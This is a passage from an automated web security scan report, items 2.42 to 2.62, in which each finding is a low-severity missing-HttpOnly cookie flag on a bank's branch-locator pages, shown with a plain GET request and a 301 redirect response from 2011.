Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.42. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:32 GMT
Server: Apache
Set-Cookie: JSESSIONID=9A0BB280DA7C9DA7E24E4AD939C704F3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.43. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=8CA923037C6718C1B04741D9A95EC1A1.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.44. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=0B68A2A486AD9F3B8229311E221D2997.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.45. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=C6658CA8376D5B4EE62A94F238551381.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.46. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:14 GMT
Server: Apache
Set-Cookie: JSESSIONID=D3648574B6305DCE5CC4069FC5FA6047.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.47. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=972F3B9F2EAB6D5C492CBA89E5786FB7.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.48. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:22 GMT
Server: Apache
Set-Cookie: JSESSIONID=6002E0949CB7F4C5F2AF097A65A91D02.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.49. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=AC0BBB480F2099A6B8EDB21BAC75F9AC.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.50. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=7F11E147A9E2E2EE2ECEAEF486EF5FED.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.51. http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=C65F6962783A7E8038F52EBE6D9D8FE4.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501-B__2nd__Ave_74055_OWASSO_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.52. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=D166F6454568C4273799BD80EA2008C3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.53. http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=8A9EF1BE2AA8961F67BFD64146399A8B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/501__N.__Penn_67301_INDEPENDENCE_KS/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.54. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=29AC06AAF579C22988337572C8C1B809.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.55. http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:20 GMT
Server: Apache
Set-Cookie: JSESSIONID=D7E090F4FD8DE20A8A0DD915819EA582.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/670__Sixth__Avenue_10010_NEW__YORK_NY/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.56. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:25 GMT
Server: Apache
Set-Cookie: JSESSIONID=6A0C04CA877B072806863384C87D2F61.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.57. http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:02 GMT
Server: Apache
Set-Cookie: JSESSIONID=7D18AE963A9E8D9985354CAA9F653B54.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/711__Lacey__Rd_08731_FORKED__RIVER_NJ/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.58. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=43547AE9E5832FEB967608E2B30B2F4B.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.59. http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=503D7039AB880BB54D195E4C66F5A72F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7860__E__Admiral_74115_TULSA_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.60. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=FDB769A3B33EAC5D6E62A720D923C0EA.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.61. http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=EDA69F0E4472188CD639AF8ABA68BC8E.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/7878__E.__Admiral__Pl._74115_TULSA_OK/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

2.62. http://locators.bankofamerica.com/locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /locator/locator/800__Avenue__of__the__Americas_10001_NEW__YORK_NY/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:42 GMT
Server: Apache
Set-Cookie: JSESSIONID=E4278635B70705F664F70D055D537547.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
